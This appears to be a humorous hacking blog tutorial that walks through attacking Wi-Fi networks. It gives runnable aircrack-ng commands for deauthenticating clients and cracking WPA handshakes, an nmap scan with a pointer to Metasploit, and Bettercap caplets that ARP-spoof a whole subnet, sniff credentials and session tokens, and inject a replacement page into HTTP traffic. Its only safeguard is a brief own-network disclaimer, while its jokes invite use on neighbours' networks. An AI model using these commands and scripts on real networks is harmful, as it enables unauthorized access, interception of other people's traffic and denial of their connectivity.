Well well well… look who’s searching for sketchy things online. You’ve just been added to a watchlist. And at what cost? So you don’t miss out on cat memes? Look, I get it, but it’s illegal and…

…it just so happens that I also love cat memes. So yes, I will teach you how to hack wireless networks.

In this article, you will learn how to:

  • Disconnect devices from an access point and prevent them from reconnecting
  • Crack wifi passwords to gain access to a network
  • Attack the devices on a network

By the end, you’ll also have a solid understanding of the underlying mechanics of wireless networks.

However, be aware that breaking into your neighbors wifi is illegal. So of course, the knowledge provided is purely for educational purposes. For kicks and giggles if you will. Do not use any of these techniques against any networks (besides your own) unless you have explicit permission.

 

How do my devices connect to the Internet?

If you are unfamiliar with how wifi operates, the next two sections will get you caught up. You can skip these but I highly recommend you do not.

 

Network interfaces

A “network” is a collection of interconnected devices that communicate with each other and can vary in size:

  • Local Area Network (LAN): These networks connect devices within a small area, like within your home or school
  • Wide Area Network (WAN): These networks connect devices over much larger areas, such as entire cities, countries, or continents. The Internet is a global WAN

A “network interface” is the means by which a device communicates with other devices on a network – whether physical (such as two computers connected by an Ethernet cable), wireless (wifi/Bluetooth/cellular), or virtual (a virtual connection to a remote VPN server).

Each network interface has its own unique Medium Access Control (MAC) address which acts as an identifier for the device.

A physical Network Interface Card (NIC) with an ethernet port. Source.

You can view the network interfaces of a device in a terminal with:

  • ip: This command will return details of all the interfaces, both physical and virtual. It replaces the mostly-deprecated “ifconfig” command
  • iw: This command will just return details of the wireless interfaces (wifi interfaces). It replaces the mostly-deprecated “iwconfig” command

 

WiFi networks

If you have wifi in your home, your modem connects your home network to your Internet service provider (ISP). Your modem gets a single public Internet Protocol (IP) address to identify it on the Internet. This public IP address is then shared with the WAN interface of your router.

In order to share this Internet connection, a wireless access point (WAP) (typically built-in to your router) creates and broadcasts the wifi network with an SSID (the name of the network). The SSID network name displayed in your device settings is the signal being transmitted by your router.

The router is responsible for assigning unique private IP addresses to all the connected devices to the wifi network. This network management system is known as the Dynamic Host Configuration Protocol (DHCP).

The router is often referred to as your “gateway” to the Internet.

 

The Address Resolution Protocol (ARP) then associates the IP address with the MAC address of your device. When other devices on the network want to communicate with you, or when you want to communicate with them, an ARP request is broadcast. The device with the requested IP address will respond with its MAC address.

Each device stores a list of MAC and IP address pairs in its “ARP table”. By looking at the entries in the ARP table, a device can determine if the device it wants to communicate with is on the same network.

If it is, the device can send the data directly to the target device using the MAC address stored in the ARP table. However, if the destination device is not on the same local network, the router will need to forward the data to the appropriate network, using its own IP and MAC address for routing purposes.

When a device communicates with the WAN of the Internet, the router performs a process called Network Address Translation (NAT). NAT translates the private IP address of the device to the router’s public IP address. This allows multiple devices on the local network to share the same public IP when accessing external resources. The router then forwards the data to the modem, which sends it along to the ISP. The ISP routes the data to the public IP address of the intended destination.

Once the data returns, it follows the reverse path: the modem receives the response, the router performs NAT to map the public IP back to the appropriate private IP address, and forwards it to the device that made the original request.

 

To get started, you will need…

A wifi adapter is a wireless network interface and you will need one that is suitable for hacking.

To follow along, you will need to buy a wifi adapter with a chipset and driver software that supports “monitor mode”. Here is an extensive list of adapters that will work out-of-the-box. I am using the ALFA Network AWUS036ACM Long-Range Dual Band wifi USB Adapter.

Also note that all instructions will be in the context of the Kali Linux distribution. If you are using a different operating system or Linux distribution, refer to the installation instructions according to the official documentation of the tools.

 

Cracking wifi passwords

We covered this briefly in another article but in case you missed it…

Let’s start with learning how to carry out a dictionary attack in order to discover someone’s wifi password. This technique will work against older security standards: WEP, WPA, and WPA2. These standards provide authentication, encryption, and data integrity checks but are vulnerable to password cracking attacks if you are able to capture the data packets that are generated when a client joins a wireless network.

“When a client joins a network? So I’ll have to wait until someone manually connects to the target wifi network?” – You, circa maybe right now.

Well, instead of waiting around, we can forcefully disconnect any currently connected devices. When they reconnect automatically, we’ll get what we need.

For this attack, we will use the Aircrack-ng toolkit, as it comes preinstalled on Kali.

In the following steps and commands, values within angle brackets (<>) should be replaced with your appropriate values.

1. View your wireless network interfaces:

iwconfig

2. Now, plug in your wifi adapter to view the adapter’s network interface name:

iwconfig

You will see an additional entry, in this case wlan1.

3. Terminate any running processes that may conflict with monitor mode:

sudo airmon-ng check kill

4. Enable monitor mode:

sudo airmon-ng start <wlan1>

Notice that the adapter receives a new name when monitor mode is enabled (wlan1mon).

5. Scan for nearby wireless access points:

sudo airodump-ng <wlan1mon>

6. In the ESSID column, find the table row associated with your wireless network name. Exit using CTRL+C.

7. Target your network using the BSSID and CH number obtained in the previous step, specify a name for the output files that will be generated, and provide your adapter’s wlan name:

sudo airodump-ng -c <CH number> --bssid <target MAC address> -w <file name> <wlan1mon>

8. Open a new terminal and execute a deauthorization attack by running the following command to forcefully disconnect all devices on your wireless network. No device will be able to reconnect until you decide to stop using CTRL+C*:

sudo aireplay-ng -0 0 -a <target MAC address> <wlan1mon>

*Though we will still capture the connection packets required to crack the password, modern wifi access points may prevent consistent deauthorization. However, if your router is outdated these attacks will successfully block devices from reconnecting until you stop with CTRL+C.

9. Once a client reconnects, notice the WPA handshake: <target MAC address> message in the upper right corner of the airodump-ng terminal.

10. Add your valid wifi password to a wordlist and save the change. You can insert it into one of the preinstalled wordlists with:

sudo nano /usr/share/wordlist/dirb/big.txt

11. Use ls to view the output files. To crack the wifi password, perform a dictionary attack using a wordlist that contains your valid password against the .cap file:

aircrack-ng -w /usr/share/wordlists/dirb/big.txt <file name>.cap

12. You will see the message KEY FOUND! [ <valid password> ] once the match is made:

To regain wifi on your own device, restart it or:

1. Put the adapter back in “monitor mode”:

sudo airmon-ng stop wlan1mon

2. Restart the killed processes:

sudo systemctl start NetworkManager && sudo systemctl start wpa_supplicant

Now that you have the password, you can gain access to the network. If this was a network other than your own, you would have what the kids call “unauthorized access”. To attack other devices on the network, let’s switch to another tool.

 

Bettercap

Bettercap is a comprehensive network monitoring and Man-in-the-Middle (MITM) tool that you can use to carry out a variety of attacks.

Its main advantage over other tools is its ease of use, thanks to its module system. Each module provides certain functions to control the tool or perform network operations. These functions can be further configured by providing values to their available parameters, giving you fine-tuned control.

With “caplets” you can combine these modules and pre-define parameters to script entire attacks. The installation comes with a set of official caplets, located in the /usr/share/bettercap/caplets directory.

On Kali Linux, you can install Bettercap with:

sudo apt install bettercap

 

What else is on the network?

Let’s scan the network to discover the other connected devices:

net.probe on

Your results should be similar to mine. In the list you will notice familiar items, such as the “smart” devices and gaming consoles in your home. As you can see, we now know each device’s IP and MAC address.

To see the results listed in a table, use:

net.show

Pro-tip: You can achieve more detailed results using nmap:

sudo nmap -sS -sV -O 192.168.0.0/24 -oN nmap_scan.txt

You could even add --script=vuln to the scan to test for known vulnerabilities and exploit them using tools like Metasploit. But, we’ll cover that another day.

 

ARP spoofing attacks

With a list of targets in hand, we can now carry out attacks. Remember how devices on the network will use their ARP tables to identify each other?

Using Bettercap’s arp.spoof module, we can target the ARP tables of other devices on the network so they associate the MAC address of our device with the router’s IP address. Once the other devices update their ARP tables with this deceptive information, they will unknowingly send their outbound traffic to us instead of the router.

Exit Bettercap by entering q and let’s make a caplet for this attack:

sudo nano /usr/share/bettercap/caplets/arp-spoof.cap

The contents of the file will be:

# Exclude https, dns, and mdns requests from feed.
# Discover devices on the network.
# Capture both inbound and outbound traffic.
# ARP spoof all devices on the network.
# Execute the attack.
# View live-feed of traffic.

events.ignore net.sniff.https
events.ignore net.sniff.dns
events.ignore net.sniff.mdns
net.recon on
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.0.0/24
arp.spoof on
net.sniff on

Run the caplet with:

sudo bettercap -caplet arp-spoof.cap

If someone was using a website that used HTTP instead of the secure, encrypted version of the protocol, HTTPS, you would see the traffic in its human-readable cleartext form. You can test this by visiting a purposefully vulnerable website like http://zero.webappsecurity.com/login.html.

As you navigate the site, you will see sensitive data such as session tokens and account information in the Bettercap feed:

 

Injection attacks

With Bettercap’s http.proxy module, you can modify HTTP traffic in real-time. This module acts as a transparent proxy, allowing you to inject JavaScript code, modify page content, and manipulate HTTP requests and responses. You can replace images, inject custom HTML, modify form submissions, and even serve completely custom web pages.

Let’s create a caplet that will serve a custom web page. First make a new directory to store the two files we will create:

sudo mkdir /usr/share/bettercap/caplets/proxy-page

Next, create a proxy-page.js file:

sudo nano /usr/share/bettercap/caplets/proxy-page/proxy-page.js

Write the following script:

function onRequest(req, res) {
if(req.Path == "/") {
res.Status = 200;
res.ContentType = "text/html";
res.Body = "<html><body><h1>Well hello! You have been hacked friend!</h1></body></html>";
return true;
}
}

Now, let’s write the .cap file:

sudo nano /usr/share/bettercap/caplets/proxy-page/proxy-page.cap

# Everything included in arp-spoof.cap plus:
# Our custom page will be displayed anytime a user visits the base domain of any website.

events.ignore net.sniff.https
events.ignore net.sniff.dns
events.ignore net.sniff.mdns
net.recon on
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.0.0/24
set http.proxy.script ./proxy-page.js
http.proxy on
arp.spoof on
net.sniff on

Run the caplet with:

sudo bettercap -caplet proxy-page/proxy-page.cap

Every time someone navigates to the base domain of an HTTP website, our page will be displayed instead. Test it out by visiting example.com.

 

Basic Bettercap usage

There are many more types of attacks and options available when using Bettercap. Before I leave you to your own devices, let’s cover some basic usage to get you started.

If you need to use your wifi adapter, you can specify the interface at launch using:

sudo bettercap -iface <adapter wlan>

You can view a list of available commands with: help

A list of the available modules and their status will also be included in the output of help. At any time, you can view the currently enabled modules using active.

View a more detailed list of modules in the official documentation.

To view the available functions and parameters of a certain module, use: help <module>

A value can be assigned to a parameter using the set keyword:

set <parameter name> <value>

You can set multiple parameters using semicolons as delimiters:

set <parameter name> <value>; set <parameter name> <value>; set <parameter name> <value>;

With the -eval flag, instead of configuring an attack during runtime, you can enable modules and set parameters at startup to launch directly into an attack:

sudo bettercap -iface wlan1 -eval "set <parameter name> <value>; set <parameter name> <value>; <module name> on; <module name> on"

View a list of all event ids in the official documentation.

The ticker module can be used to execute commands at regular intervals:

set ticker.period <time in seconds>; set ticker.commands "<module name> <parameter>"; ticker on

With “caplets” you can script entire attacks. The installation comes with a set of official premade caplets, located in the /usr/share/bettercap/caplets directory.

 

Bettercap Web UI

Bettercap also provides the tool as a web user interface. With Bettercap running, you can download and install the latest stable release of the web UI with:

ui.update

Open a new terminal window and change the default username and password in both the http-ui.cap and https-ui.cap file:

sudo nano /usr/share/bettercap/caplets/http-ui.cap
sudo nano /usr/share/bettercap/caplets/https-ui.cap

Back in the terminal with Bettercap running, launch the web UI with:

https-ui

Navigate to http://localhost:443 in your browser. Since the generated SSL/TLS certificate is a self-signed certificate, you will get a browser warning. Click Advanced… and select Accept the Risk and Continue since we know the certificate.

Enter your credentials to log in.

“Hold on. Can’t connect to ‘https://127.0.0.1:8083/api’?”

We will also need to add a certificate exception for the API server. Open Firefox’s setting page and type certificates in the Find in Settings search bar. Click on View Certificates.

In the Servers tab, you will notice the exception we made when we navigated to the page. Click Add Exception… and type https://127.0.0.1:8083 to the Location input field. Then, click Get Certificate. Ensure the Permanently store this exception checkbox is checked and click Confirm Security Exception.

You will see the new entry in the table. Click OK.

Now, when you are able to successfully log in to the web UI dashboard:

Now, you can operate Bettercap with a more user-friendly interface. The modules are listed horizontally at the top and you can set parameters in the Advanced page. Certain functions are available as buttons and you can enter commands in the Command bar … input field.

 

Conclusion

Now, you can kitten scroll (quit doomscrolling) to your heart’s content. Using YOUR wifi network of course. If you ever forget YOUR wifi password, instead of performing a factory reset, you now know how to make guesses by the millions. Bookmark this article for quick reference and check back in as we may continue learning from here in future articles.

Who knows, maybe next time I’ll teach you how to build a portable device for wifi hacking shenanigans…

Behave. Remember, you are now on that watchlist.

Love,

Ninjeeter

Tags: